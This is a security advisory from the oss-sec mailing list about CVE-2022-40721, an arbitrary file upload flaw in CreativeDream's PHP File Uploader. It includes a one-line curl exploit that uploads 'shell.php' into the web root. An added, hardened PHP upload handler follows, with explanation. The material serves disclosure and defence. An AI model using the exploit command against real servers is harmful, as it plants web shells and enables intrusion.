oss-sec mailing list archives

CreativeDream software arbitrary file upload


From: Larry Cashdollar <larry0 () me com>
Date: Mon, 3 Oct 2022 12:17:43 -0400


Title: CreativeDream software arbitrary file upload
Author: Larry W. Cashdollar
Date: 2022-09-08
CVE-ID: CVE-2022-40721
Download Site: https://github.com/CreativeDream
Vendor: CreativeDream
Vendor Notified: 2020-02-19
Vendor Contact: yuliangagarin [at] mail.ru
References: https://github.com/CreativeDream/php-uploader/issues/23
Advisory: http://www.vapidlabs.com/advisory.php?v=216
Description: PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download
files to a web server.
Vulnerability:
The software allows executable file uploads to the web root directory.
Exploit Code:
        curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
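For contrast with the behaviour reported above (any uploaded file, including a .php file, is written under the web root where the server will execute it), the following is an added example of a hardened upload handler. It is not code from the advisory or from the php-uploader project. It assumes a storage directory outside the document root (the UPLOAD_DIR path is a placeholder), an allowlist of image types, and that only the uploaded bytes, never the client-supplied filename or Content-Type, decide how a file is stored.

```php
<?php
// Added example, not part of the advisory or the php-uploader project.
// Hardened counterpart to an upload handler that writes arbitrary files
// into the web root: files go outside DocumentRoot, the client-supplied
// name and type are discarded, and the stored file is never executable.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/uploads-private'; // assumed path, outside the web root
const MAX_BYTES  = 5 * 1024 * 1024;

// Allowlist keyed by the MIME type sniffed from file content. The server,
// not the client, chooses the extension the stored file gets.
const ALLOWED = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and return the server-chosen stored
 * filename, or throw RuntimeException on any violation.
 */
function store_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Refuse anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // Sniff the content type from the bytes; the original name ("shell.php")
    // and the multipart Content-Type header carry no weight here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !isset(ALLOWED[$mime])) {
        throw new RuntimeException('disallowed content type');
    }

    // Random name plus allowlisted extension: no path traversal, no
    // double extensions, no attacker-controlled characters.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . DIRECTORY_SEPARATOR . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the web server, never executable
    return $name;
}

// Request handling: same field name ("files") the advisory's request uses.
header('Content-Type: application/json');
try {
    echo json_encode(['stored' => store_upload($_FILES['files'] ?? [])]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['error' => $e->getMessage()]);
}
```

Two design points: the directory is outside the web root, so even a file that slipped past the allowlist could not be requested as a URL, and the web server should additionally be configured not to execute scripts in any upload location that must be served directly. Rejecting by content type and discarding the client name together close the gap that a request such as the one above relies on, where the filename extension alone determines whether the server will execute the result.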
